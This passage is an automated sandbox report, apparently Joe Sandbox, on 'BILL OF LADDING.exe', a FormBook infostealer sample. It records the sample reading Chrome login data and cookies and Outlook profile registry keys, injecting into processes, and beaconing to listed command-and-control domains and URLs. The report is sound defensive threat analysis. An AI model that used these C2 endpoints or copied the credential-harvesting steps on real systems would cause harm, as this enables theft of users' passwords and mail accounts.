        Source: BILL OF LADDING.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: dYBbPgrkLOIMQ.exe, 00000003.00000002.885118091.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000000.381939867.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000000.413884188.0000000000D20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gtrhl.zip VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote Services1
        Email Collection        		5
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        Scheduled Task/Job        		312
        Process Injection        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Data from Local System        		5
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Abuse Elevation Control Mechanism        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		1
        DLL Side-Loading        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
        Remote System Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync113
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529813 Sample: BILL OF LADDING.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 32 www.djazdgc.tokyo 2->32 34 longg002.cn 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 7 other signatures 2->54 10 BILL OF LADDING.exe 1 2->10         started        signatures3 process4 signatures5 68 Writes to foreign memory regions 10->68 70 Maps a DLL or memory area into another process 10->70 13 svchost.exe 10->13         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 16 dYBbPgrkLOIMQ.exe 13->16 injected process8 signatures9 44 Maps a DLL or memory area into another process 16->44 46 Found direct / indirect Syscall (likely to bypass EDR) 16->46 19 schtasks.exe 1 20 16->19         started        process10 dnsIp11 36 www.sqlite.org 45.33.6.223, 49164, 80 LINODE-APLinodeLLCUS United States 19->36 30 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 19->30 dropped 56 Tries to steal Mail credentials (via file / registry access) 19->56 58 Tries to harvest and steal browser information (history, passwords, etc) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Queues an APC in another process (thread injection) 19->62 24 dYBbPgrkLOIMQ.exe 19->24 injected 28 firefox.exe 19->28         started        file12 signatures13 process14 dnsIp15 38 www.sailforever.xyz 24->38 40 www.launchdreamidea.xyz 24->40 42 18 other IPs or domains 24->42 64 Found direct / indirect Syscall (likely to bypass EDR) 24->64 signatures16 66 Performs DNS queries to domains with low reputation 40->66

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        BILL OF LADDING.exe34%ReversingLabsWin32.Trojan.AutoitInject
        BILL OF LADDING.exe43%VirustotalBrowse
        BILL OF LADDING.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\sqlite3.dll0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        webredir.vip.gandi.net0%VirustotalBrowse
        booosted.xyz1%VirustotalBrowse
        www.drevohome.shop1%VirustotalBrowse
        030002837.xyz0%VirustotalBrowse
        longg002.cn1%VirustotalBrowse
        gws-treinamento2.shop1%VirustotalBrowse
        mondayigboleague.info0%VirustotalBrowse
        www.givingaway123.net1%VirustotalBrowse
        ethetf.digital0%VirustotalBrowse
        www.sailforever.xyz1%VirustotalBrowse
        www.sqlite.org0%VirustotalBrowse
        www.booosted.xyz1%VirustotalBrowse
        www.djazdgc.tokyo0%VirustotalBrowse
        www.gws-treinamento2.shop1%VirustotalBrowse
        www.mondayigboleague.info0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
        https://duckduckgo.com/ac/?q=0%URL Reputationsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
        https://www.icann.org/resources/pages/non-response-2014-01-29-en0%VirustotalBrowse
        http://emailverification.info/0%VirustotalBrowse
        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%VirustotalBrowse
        http://www.booosted.xyz1%VirustotalBrowse
        https://www.gandi.net/en/domain0%VirustotalBrowse
        https://www.google.com/favicon.ico0%VirustotalBrowse
        http://www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip0%VirustotalBrowse
        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        webredir.vip.gandi.net
        		217.70.184.50
        		truetrueunknown
        booosted.xyz
        		3.33.130.190
        		truetrueunknown
        www.launchdreamidea.xyz
        		188.114.97.3
        		truetrue
          		unknown
          www.drevohome.shop
          		54.38.220.85
          		truetrueunknown
          longg002.cn
          		8.210.49.139
          		truetrueunknown
          www.rudemyvague.info
          		52.13.151.179
          		truetrue
            		unknown
            www.itemsort.shop
            		188.114.97.3
            		truetrue
              		unknown
              030002837.xyz
              		65.21.196.90
              		truetrueunknown
              gws-treinamento2.shop
              		84.32.84.32
              		truetrueunknown
              mondayigboleague.info
              		3.33.130.190
              		truetrueunknown
              www.givingaway123.net
              		103.224.182.242
              		truetrueunknown
              ethetf.digital
              		15.197.148.33
              		truetrueunknown
              www.sailforever.xyz
              		103.106.67.112
              		truetrueunknown
              www.jagdud.store
              		209.74.64.187
              		truetrue
                		unknown
                www.sqlite.org
                		45.33.6.223
                		truefalseunknown
                www.030002837.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.booosted.xyz
                  		unknown
                  		unknowntrueunknown
                  www.djazdgc.tokyo
                  		unknown
                  		unknowntrueunknown
                  www.stocksm.fun
                  		unknown
                  		unknowntrue
                    		unknown
                    www.mondayigboleague.info
                    		unknown
                    		unknowntrueunknown
                    www.gws-treinamento2.shop
                    		unknown
                    		unknowntrueunknown
                    www.ethetf.digital
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.launchdreamidea.xyz/bd77/true
                        		unknown
                        http://www.ethetf.digital/m7sk/true
                          		unknown
                          http://www.drevohome.shop/v2k8/?jnQX=XThEFIcSG6Rk+ek7c8+em164NM7RE7zsg7f4UZ5pblIcrBlS4WXKWr830TKyJQKZuaIDwmyKi1LLwtKiy3gv2K3CAz8zZZIYsqZVYXDMbAsgSXM6eWVqobGzrSjZ&op9=BLtTm0Vtrue
                            		unknown
                            http://www.rudemyvague.info/t7t4/?jnQX=JME/FbwkkQiTLR8Hpq6D7hdkRf4IpbxJ+vLJvTOCgHppMKWbYWfaTBHe/9olNtMnBFYydrc5qS+BY9eInbnUEE+fai2nxgmrSKR1Lz1Vur11jq7KYWpx7HNZ/+DB&op9=BLtTm0Vtrue
                              		unknown
                              http://www.stocksm.fun/0bvj/true
                                		unknown
                                http://www.030002837.xyz/y045/true
                                  		unknown
                                  http://www.givingaway123.net/1juc/?jnQX=Sd7Ig8sUf85GUDOd+69y7q8ASEJkpRiPhIDwYHX4t/HDftDJcaAUQz0Nk1YScc8PwXRpFHVhI0pUMDPk3EzgwMmR193QTxiRUXmZ38pZMEafFZRyFsF28n3zyVCi&op9=BLtTm0Vtrue
                                    		unknown
                                    http://www.jagdud.store/qxse/true
                                      		unknown
                                      http://www.rudemyvague.info/t7t4/true
                                        		unknown
                                        http://www.drevohome.shop/v2k8/true
                                          		unknown
                                          http://www.launchdreamidea.xyz/bd77/?op9=BLtTm0V&jnQX=qUcYNRi6MmsiGKrh9NCA2amnhNOWcK/IcWj4n4RDTJ9SK0tIDWNU88L5d2vVfSnlJTsqAOrwZWsiYZ0lCIKh+05AxDn9xcp1Qtj0O+O6OKrHR59mj2SDK4c9wfNVtrue
                                            		unknown
                                            http://www.stocksm.fun/0bvj/?jnQX=JoV24jQMdS4/3i4C2Azs6HkIa5jkTaNy+Ik40cffOJE8Oz5kZb+e9PwZtqgkJTMo0IB+xAx5/WHdbF25CbK7oeKf/9ddGNs9w6nA5aUYEeZWEqUjEZt1tayRpXZ5&op9=BLtTm0Vtrue
                                              		unknown
                                              http://www.mondayigboleague.info/t10u/true
                                                		unknown
                                                http://www.itemsort.shop/qw71/?op9=BLtTm0V&jnQX=+N/0E0v6NJCVb806DMB0CZmH+23dphvoX4nqdcW8deD1xdZOlnbQi9bOuP5MTQFhk1MFTYVpuSFcpFTZFESSLFlEbVNSdqMunFXh13AQ5nMFb0g8ejQn+jENhOCutrue
                                                  		unknown
                                                  http://www.booosted.xyz/12c7/?jnQX=rkKrlAe8PM32Rlyo3XGhAGHv/PebKrU9ljR3Eqrj5cYHYbO4IgL/tGu5VYz7wugWP81CfRwkkbYRscbYiAGJC2F8RXw04VbxiTu+G9foPjo3PMuVsrJsiyJ6G7sg&op9=BLtTm0Vtrue
                                                    		unknown
                                                    http://www.booosted.xyz/12c7/true
                                                      		unknown
                                                      http://www.sailforever.xyz/hshp/true
                                                        		unknown
                                                        http://www.gws-treinamento2.shop/9vaq/?jnQX=iWdqg5dx+nxgXMJv6fkLiwcVGHqfo0uT2/zaY5dN5WRtbG72PfYUoC7d90JyyrKd7ng9xxty1D2HdVJ8v/8coxWlMdmEcT26SfoT6cgNzC3qUmeIqeviCd2ntANB&op9=BLtTm0Vtrue
                                                          		unknown
                                                          http://www.030002837.xyz/y045/?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJMs/YJXs1dmV0xz4NUECnrSGc1HY+X/o4eGLvG/kHjylnkJsIYeylKQW6IjjpW3QwsGL9rSqTC02R0siCnxO5Xuy1NPmqltrue
                                                            		unknown
                                                            http://www.givingaway123.net/1juc/true
                                                              		unknown
                                                              http://www.mondayigboleague.info/t10u/?jnQX=z2kOE6Hdw1U1MLXklDyp9Yeiaynt+oJtvvr0x5hWEi4SF2SHBGm8iJVVQ9fey1U/CoztigTmFBDjEJBprUmgmj56JVnqLqZmNm1dTZL5G96LsAIGFczAt5NVhqxy&op9=BLtTm0Vtrue
                                                                		unknown
                                                                http://www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zipfalseunknown
                                                                http://www.gws-treinamento2.shop/9vaq/true
                                                                  		unknown

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://duckduckgo.com/chrome_newtabschtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.givingaway123.net/1juc/?jnQX=Sd7Ig8sUf85GUDOddYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003DA4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duckduckgo.com/ac/?q=schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?op9=BLtTm0V&jnQX=y1BC7gE5U9SjKVi7QbOvAwWuygTbNwJMschtasks.exe, 00000004.00000002.885346022.0000000003CC8000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.00000000040C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.icann.org/resources/pages/non-response-2014-01-29-endYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                      http://emailverification.info/dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.sailforever.xyz/hshp/?jnQX=MBiESr0hPmgVFuSAv2RW9BnB0CPkTLgBjfLus90OagNghP1boqy5EEnwCusO6dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.00000000035CA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchschtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalseunknown
                                                                        https://www.gandi.net/en/domainschtasks.exe, 00000004.00000002.885346022.0000000003680000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003A80000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                        http://www.booosted.xyzdYBbPgrkLOIMQ.exe, 00000005.00000002.885097332.0000000000A51000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                                                        https://www.google.com/favicon.ico6222f67M.4.drfalseunknown
                                                                        https://ac.ecosia.org/autocomplete?q=schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://whois.gandi.net/en/results?search=stocksm.funschtasks.exe, 00000004.00000002.885346022.0000000003680000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885268329.0000000003A80000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.sqlite.org/copyright.html.schtasks.exe, 00000004.00000002.885978365.0000000061EB2000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=schtasks.exe, 00000004.00000003.445121568.0000000005CF8000.00000004.00000020.00020000.00000000.sdmp, 6222f67M.4.drfalseunknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          45.33.6.223
                                                                          		www.sqlite.orgUnited States
                                                                          		63949LINODE-APLinodeLLCUSfalse
                                                                          65.21.196.90
                                                                          		030002837.xyzUnited States
                                                                          		199592CP-ASDEtrue
                                                                          103.224.182.242
                                                                          		www.givingaway123.netAustralia
                                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                          84.32.84.32
                                                                          		gws-treinamento2.shopLithuania
                                                                          		33922NTT-LT-ASLTtrue
                                                                          52.13.151.179
                                                                          		www.rudemyvague.infoUnited States
                                                                          		16509AMAZON-02UStrue
                                                                          54.38.220.85
                                                                          		www.drevohome.shopFrance
                                                                          		16276OVHFRtrue
                                                                          15.197.148.33
                                                                          		ethetf.digitalUnited States
                                                                          		7430TANDEMUStrue
                                                                          103.106.67.112
                                                                          		www.sailforever.xyzNew Zealand
                                                                          		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                          209.74.64.187
                                                                          		www.jagdud.storeUnited States
                                                                          		31744MULTIBAND-NEWHOPEUStrue
                                                                          188.114.97.3
                                                                          		www.launchdreamidea.xyzEuropean Union
                                                                          		13335CLOUDFLARENETUStrue
                                                                          217.70.184.50
                                                                          		webredir.vip.gandi.netFrance
                                                                          		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                          3.33.130.190
                                                                          		booosted.xyzUnited States
                                                                          		8987AMAZONEXPANSIONGBtrue

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1529813
                                                                          Start date and time:2024-10-09 12:49:55 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 20s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:8
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:2
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:BILL OF LADDING.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/6@15/12
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
